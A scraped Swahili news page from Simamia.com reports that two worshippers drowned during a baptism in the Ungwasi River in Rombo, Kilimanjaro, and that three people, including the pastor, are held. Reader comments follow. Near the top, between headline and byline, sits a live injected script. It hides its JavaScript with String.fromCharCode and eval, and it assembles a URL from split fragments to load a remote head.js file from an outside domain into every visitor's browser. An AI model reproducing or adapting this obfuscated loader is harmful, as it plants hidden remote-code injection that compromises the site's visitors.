Recent Comments

Waumini wawili wafa maji wakibatizwa. Rombo

<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
kutoka-simamia na (Shaaban)

Rombo. Waumini wawili wa Kanisa la Shalom wamekufa maji wakibatizwa katika Mto Ungwasi wilayani Rombo baada ya mmoja wao kupandisha mapepo na kuwatumbukiza majini.

Mkuu wa Wilaya ya Rombo mkoani Kilimanjaro, Agnes Hokororo amethibitisha tukio hilo lililotokea, Julai 16 saa sita mchana. Ubatizo huo ulifanyika kwenye kina kirefu cha mto huo.

Amesema wakati ibada ya ubatizo mmoja wa waumini aliyepandisha mapepo alimtumbukiza mmoja wa watu waliokuwa wakisubiri kubatizwa na mchungaji.

Hokororo amesema muumini mmoja alipoona mwenzake ametumbukizwa majini aliamua kumwokoa, ndipo aliyepandisha pepo alipowashikilia wote wawili ndani ya maji na kuwasababishia kifo.

Amesema watu watatu akiwamo mchungaji wa kanisa hilo lililopo katika Kijiji cha Mandechini wanashikiliwa. Tuandikie Maoni yako hapo chini.

By Shaban Rashid Said Kisleu Fahari Eliya

Kwa jina anaitwa Shaban Rashid Said Kisleu na ni mhariri hapa Simamia Media Group. Natumaini mtafurahishwa na yake nitakayowaletea na mtaendelea kufatilia mitandao wa Simamia.com Kumfikia, tuma email SimamiaTeam@gmail.com

5 thoughts on “Waumini wawili wafa maji wakibatizwa. Rombo”
  1. Wakati anatumbukizwa na wa pili huyo mchungaji kasimama pembeni kushuhudia bila kuwaokoa

  2. Huyo Mchungaji achukuliwe hatu
    Kwani alipoona mmoja katumbukia alichukua jukum gani au alipanga napia Hugo wa mapepo achunguzwe vizuri kwani eengi wao wamekuwa wakifanya hivyo kuwafanganya waumini kuwa Ubatizo wa mji mengi ndio wakweli nahicho kilichotokea wahusika wakamatwe maramoja kwa wauwaji kama wengine tu

  3. kwn huyo mchungaji alipona mmoja amesha sukumwa majin kwa nini wasimdhibiti huyo aliye act amepandwa na mapepo.hilo kanisa wajifunze ubatizo siyo kuzamishwa.

  4. Marekebisho yamefanyika katika taarifa hii iliyotundikwa. tareh 17/7/2017 na (Shaaban) ikizungumzia waumini waliofariki wakibatizwa. kanisa sio Siloam ni Shalom marekebisho yamefanyika.

Comments are closed.